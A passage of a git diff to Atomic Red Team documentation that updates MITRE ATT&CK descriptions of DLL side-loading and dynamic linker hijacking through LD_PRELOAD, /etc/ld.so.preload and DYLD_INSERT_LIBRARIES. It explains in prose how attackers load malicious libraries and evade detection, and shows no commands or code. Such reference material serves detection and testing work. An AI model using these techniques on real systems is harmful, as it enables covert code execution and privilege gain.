Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). -Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - -Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.
+Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
## Atomic Tests diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index a3370e4d..8d8a9ab8 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -1,10 +1,12 @@ -# T1574.006 - LD_PRELOAD +# T1574.006 - Dynamic Linker Hijacking ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/006) -
Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) +
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD) -Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) +On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ. -LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + +On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)
## Atomic Tests